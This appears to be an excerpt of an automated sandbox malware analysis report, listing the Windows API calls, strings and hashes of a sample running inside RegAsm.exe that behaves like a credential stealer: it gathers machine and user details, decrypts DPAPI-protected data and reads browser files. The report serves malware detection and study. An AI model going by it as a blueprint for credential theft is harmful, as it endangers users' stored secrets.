                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                            • String ID: 5A&6A
                                                                            • API String ID: 1955031769-2983527881
                                                                            • Opcode ID: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                            • Instruction ID: bb05b1d9e7c39d7df88ecf206bceb681005d45f58bf20589137b6770423741ef
                                                                            • Opcode Fuzzy Hash: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                            • Instruction Fuzzy Hash: AC4242B1D00358AADF10EBA5CD46BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00406190
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 3869837436-0
                                                                            • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                            • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                            • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                            • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041043B
                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                            • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                            • CharToOemA.USER32(?,?), ref: 00410493
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CharOpenQueryValuememset
                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                            • API String ID: 1728412123-1211650757
                                                                            • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                            • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                            • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                            • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                            • wsprintfA.USER32 ref: 0040FFDC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                            • String ID: %d MB$@
                                                                            • API String ID: 3644086013-3474575989
                                                                            • Opcode ID: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                            • Instruction ID: 4fd6b884c886e70f5bea54c710daa34e5fcd35151b99761237641847ab172de6
                                                                            • Opcode Fuzzy Hash: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                            • Instruction Fuzzy Hash: A5F030B5A40218ABEB149BA4DC4AFBE76BEEB45705F400139F706E62C0DBB8D8058775
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415CAA
                                                                            • memset.MSVCRT ref: 00415CD6
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                            • lstrcat.KERNEL32(?), ref: 00415D55
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                            • String ID:
                                                                            • API String ID: 2333602472-0
                                                                            • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                            • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                            • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                            • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                            APIs
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                              • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                              • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                            • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                            • ExitProcess.KERNEL32 ref: 0041731C
                                                                            • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 1043047581-0
                                                                            • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                            • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                            • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                            • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00403A59
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                            • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • API ID: CrackH_prologInternetlstrlen
                                                                            • String ID:
                                                                            • API String ID: 503950642-0
                                                                            • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                            • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                            • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                            • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                            Strings
                                                                            • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                            • API String ID: 2813378046-3310892237
                                                                            • Opcode ID: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                            • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                            • Opcode Fuzzy Hash: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                            • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004064EA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                            • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                            Strings
                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                            • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                            • API String ID: 757424748-1193256905
                                                                            • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                            • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                            • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                            • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C18B
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                              • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                              • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                              • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                              • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                            • memcmp.MSVCRT ref: 0040C21C
                                                                              • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                              • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                              • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                            • String ID: $DPAPI
                                                                            • API String ID: 2477620391-1819349886
                                                                            • Opcode ID: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                            • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                            • Opcode Fuzzy Hash: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                            • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID: Windows 11
                                                                            • API String ID: 3676486918-2517555085
                                                                            • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                            • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                            • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                            • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC), ref: 0040FB6B
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                            • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID: CurrentBuildNumber
                                                                            • API String ID: 3676486918-1022791448
                                                                            • Opcode ID: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                            • Instruction ID: 38c23b2a009fde1c93731900e80abf8fdc92a9d8531a5489515771ffac6c83d0
                                                                            • Opcode Fuzzy Hash: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                            • Instruction Fuzzy Hash: 20F03076240214FBFB109BD1DC0FFAE7A7EEB45B44F101069F701A50A0D7B569409B24
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00409143
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425DB4,?,?,?,00425B9B,00000000), ref: 0040921D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                            • String ID:
                                                                            • API String ID: 3423466546-0
                                                                            • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                            • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                            • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                            • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                            APIs
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC4C947
                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC4C969
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC4C9A9
                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC4C9C8
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC4C9E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
